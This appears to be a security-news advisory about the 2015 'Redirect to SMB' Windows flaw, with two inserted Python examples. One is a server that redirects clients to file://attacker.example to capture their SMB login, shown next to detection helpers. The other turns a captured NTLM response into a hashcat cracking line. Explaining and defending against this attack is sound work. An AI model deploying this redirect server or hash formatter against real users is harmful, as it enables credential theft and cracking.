Windows exposed to "Redirect to SMB" vulnerability affecting all versions including Windows 10 - vulnerability warning - 黑吧安全网 (myhack58)

ID MYHACK58:62201561203
Type myhack58
Reporter Anonymous (佚名)
Modified 2015-04-15T00:00:00


Cylance recently disclosed a serious vulnerability in Windows through which an attacker can steal a user's authentication credentials. It affects every version of Windows, including the latest Windows 10 preview builds, and is reachable through products from around 30 companies, among them Adobe, Apple, Box, Oracle and Symantec.

Vulnerability overview

The flaw is a variant of the classic SMB vulnerability found by Aaron Spangler in 1997. Cylance calls the new form "Redirect to SMB" (the client is redirected onto the SMB protocol). It gives an attacker the chance to hijack the user's authentication, including the user name, domain and password hash, and the whole attack needs nothing more than the user clicking a link. By redirecting to SMB, an attacker in a man-in-the-middle position can hijack the authentication session and steer the victim to a malicious SMB (Server Message Block) server, which records the user name, domain and password hash. For more technical detail, download the Cylance white paper.

Attack

A security researcher tested the vulnerability through a chat client. First, the attacker either lures the user to a compromised web server or mounts a man-in-the-middle attack to control the user's network traffic. When a chat client receives a URL that points to an image, it tries to display a preview of that image, so the researcher only had to send an image URL beginning with file:// that points at a malicious SMB server: the chat client tries to load the picture, the victim's machine automatically connects to the malicious SMB server, and the system's login credentials leak without the user noticing anything.

Second, the team also ran the attack through an HTTP redirect.
The HTTP exchange is as follows (the victim's request, then the attacker's redirect; the host and redirect target were blanked in the original capture):

    GET / HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host:
    DNT: 1
    Connection: Keep-Alive

    HTTP/1.1 302 Found
    Content-Type: text/html
    Location: file://
    Content-Length: 0

Third, the researchers note that any Windows application can be exploited this way through a man-in-the-middle attack: if the attacker intercepts a request that an application makes to a remote server in the background, for example a software update check, the user is compromised without clicking any link at all.

[Video demo]
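Both halves of the redirect step, as an added example that is not code from Cylance or from the original article: the server side reproduces the captured "302 Found" with a file:// Location, and the client-side helpers show the check an HTTP client, proxy or log reviewer should apply before a Location header is followed. The host attacker.example, the share path and the sample response text are placeholders constructed for this example, not captured traffic.

```python
"""Redirect-to-SMB, both halves, as an added example (not Cylance's or the
article's code). Host names, paths and the sample response are constructed
placeholders, not captured traffic."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin, urlsplit

# Placeholder for the attacker's SMB listener (assumption, not from the page).
MALICIOUS_SMB_HOST = "attacker.example"
SAFE_SCHEMES = ("http", "https")


class RedirectToSmbHandler(BaseHTTPRequestHandler):
    """Server side of the captured exchange: every GET gets a '302 Found'
    whose Location is a file:// URL. A Windows client that follows it
    resolves file://host/share as a UNC path and authenticates to host over
    SMB (TCP 445/139) before it can even fetch the file."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Content-Type", "text/html")
        self.send_header("Location", f"file://{MALICIOUS_SMB_HOST}/share/logo.png")
        self.send_header("Content-Length", "0")
        self.end_headers()


def parse_response_head(raw):
    """Split a raw HTTP response head into (status code, {header: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def is_smb_redirect(location):
    """True when following this Location value would open an SMB connection:
    a file:// or smb:// URL, or a bare UNC path (\\\\host\\share)."""
    loc = location.strip()
    if loc.startswith("\\\\"):
        return True
    return urlsplit(loc).scheme.lower() in ("file", "smb")


def redirect_leaks_credentials(raw_response):
    """Detection check for a proxy or log review: a 3xx whose target is SMB."""
    status, headers = parse_response_head(raw_response)
    return 300 <= status < 400 and is_smb_redirect(headers.get("location", ""))


def safe_next_url(base_url, raw_response):
    """Hardened redirect handling for a client: resolve Location against the
    page URL as a browser would, but return None (refuse to follow) unless
    the result is plain http(s). A client that does this never touches SMB
    because of a redirect, whatever the server answers."""
    status, headers = parse_response_head(raw_response)
    if not 300 <= status < 400 or "location" not in headers:
        return None
    location = headers["location"]
    if is_smb_redirect(location):
        return None
    target = urljoin(base_url, location.strip())
    if urlsplit(target).scheme.lower() not in SAFE_SCHEMES:
        return None
    return target


# Reconstruction of the page's captured response with a placeholder host.
CAPTURED_302 = (
    "HTTP/1.1 302 Found\r\n"
    "Content-Type: text/html\r\n"
    f"Location: file://{MALICIOUS_SMB_HOST}/share/logo.png\r\n"
    "Content-Length: 0\r\n"
)

if __name__ == "__main__":
    print("leaks credentials:", redirect_leaks_credentials(CAPTURED_302))
    print("client would follow to:", safe_next_url("http://victim.example/", CAPTURED_302))
    # To reproduce the server side in a lab: HTTPServer(("127.0.0.1", 8080),
    # RedirectToSmbHandler).serve_forever(), then watch port 445 on the host.
```

Run as a script it classifies the reconstructed response; the server class is only started if you call it yourself. The client-side check is the fix an application vendor can ship (only ever follow redirects to http or https); the network-side equivalent, which Cylance's white paper recommends, is blocking outbound TCP 139 and 445 at the perimeter so that a redirected client cannot reach an Internet SMB server in the first place.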

Affected applications

The team identified at least 31 applications exposed to this risk, including such widely used software as Adobe Reader, iTunes and Internet Explorer 11. The list: Adobe Reader, Apple QuickTime, Apple iTunes Software Update, Internet Explorer 11, Windows Media Player, Excel 2010, Microsoft Baseline Security Analyzer, Symantec Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus, .NET Reflector, Maltego CE, Box Sync, TeamViewer, GitHub for Windows, PyCharm, IntelliJ IDEA, PhpStorm, Oracle JDK 8u31.

Microsoft response

Microsoft has not yet released an official patch for the vulnerability. It has said that the threat Cylance found is not as serious as Cylance's wording makes it sound. In an emailed statement, Microsoft said: "Several factors must come together for a man-in-the-middle (MITM) attack to occur. In 2009 we published guidance on the Microsoft Security Research and Defense blog to help users deal with this potential threat. Windows also has other features, such as Extended Protection for Authentication, which can play a defensive role when authenticating a network connection and protect the security of the credentials used on that connection."
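What the malicious SMB server actually harvests, as an added example (not Cylance's or the article's code) expanding on the overview's "user name, domain and password hash": the redirected client completes NTLM authentication by sending an AUTHENTICATE_MESSAGE (NTLMSSP type 3), and parsing that one message yields the domain, user name and workstation together with the NTLMv2 response that offline crackers consume. The domain CORP, user alice, workstation WS01, server challenge and response bytes are constructed sample values, and the builder exists only to produce that sample.

```python
"""NTLM AUTHENTICATE_MESSAGE (NTLMSSP type 3) parser: what the malicious SMB
server learns from a redirected client. Added example, not Cylance's or the
article's code; all sample values are constructed."""
import struct

SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
# AV_PAIR ids from the NTLMv2 client blob (MS-NLMP 2.2.2.1); 9 and 10 carry the
# service/channel bindings that Extended Protection for Authentication adds.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 7: "Timestamp", 9: "TargetName",
            10: "ChannelBindings"}


def build_authenticate(domain, user, workstation, nt_response, lm_response=b"\x00" * 24,
                       flags=NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_VERSION):
    """Assemble an AUTHENTICATE_MESSAGE (MS-NLMP 2.2.1.3) for the sample run.
    Six (Len, MaxLen, Offset) descriptors point into the payload that follows
    the 88-byte fixed part (signature, type, descriptors, flags, Version, MIC)."""
    parts = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    descriptors, payload, offset = b"", b"", 88
    for part in parts:
        descriptors += struct.pack("<HHI", len(part), len(part), offset)
        payload += part
        offset += len(part)
    return (SIGNATURE + struct.pack("<I", 3) + descriptors + struct.pack("<I", flags)
            + b"\x00" * 8 + b"\x00" * 16 + payload)


def _field(msg, at):
    """Read one (Len, MaxLen, Offset) descriptor and return the bytes it names."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, at)
    return msg[offset:offset + length]


def parse_av_pairs(data):
    """Decode the AV_PAIR list (AvId u16, AvLen u16, value) up to MsvAvEOL."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:
            break
        pairs[AV_NAMES.get(av_id, f"AvId{av_id}")] = data[pos:pos + av_len]
        pos += av_len
    return pairs


def parse_authenticate(msg):
    """Extract what the rogue server learns: domain, user, workstation and the
    NTLMv2 response, i.e. the 16-byte NTProofStr followed by the client blob
    (types, reserved, timestamp, client challenge, reserved, AV pairs)."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"
    nt = _field(msg, 20)
    blob = nt[16:]
    return {
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
        "workstation": _field(msg, 44).decode(enc),
        "nt_proof": nt[:16],
        "blob": blob,
        "client_challenge": blob[16:24] if len(blob) >= 28 else b"",
        "av_pairs": parse_av_pairs(blob[28:]) if len(blob) >= 28 else {},
    }


def hashcat_line(parsed, server_challenge):
    """Format the capture the way offline crackers take it (hashcat mode 5600):
    USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB, all hex."""
    return "{}::{}:{}:{}:{}".format(parsed["user"], parsed["domain"], server_challenge.hex(),
                                    parsed["nt_proof"].hex(), parsed["blob"].hex())


# Constructed sample values (not captured traffic). The server picks the
# challenge, so the rogue server always knows it.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8            # types, reserved, timestamp
               + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4  # client challenge, reserved
               + struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le")  # MsvAvNbDomainName
               + struct.pack("<HH", 0, 0) + b"\x00" * 4)          # MsvAvEOL, padding
SAMPLE_NT_RESPONSE = bytes(range(16)) + SAMPLE_BLOB
SAMPLE_MESSAGE = build_authenticate("CORP", "alice", "WS01", SAMPLE_NT_RESPONSE)

if __name__ == "__main__":
    captured = parse_authenticate(SAMPLE_MESSAGE)
    print(hashcat_line(captured, SERVER_CHALLENGE))
```

The server never receives the password itself, only the NTLMv2 response, which is an HMAC over the server challenge and the client blob keyed by the password hash; that is enough for offline guessing, and relayable to another service while the session is live. The TargetName and ChannelBindings AV pairs are where Extended Protection for Authentication, which Microsoft's statement points to, lives: a legitimate server checks them to reject a relayed response, but they do nothing against a rogue server that simply records the exchange for cracking.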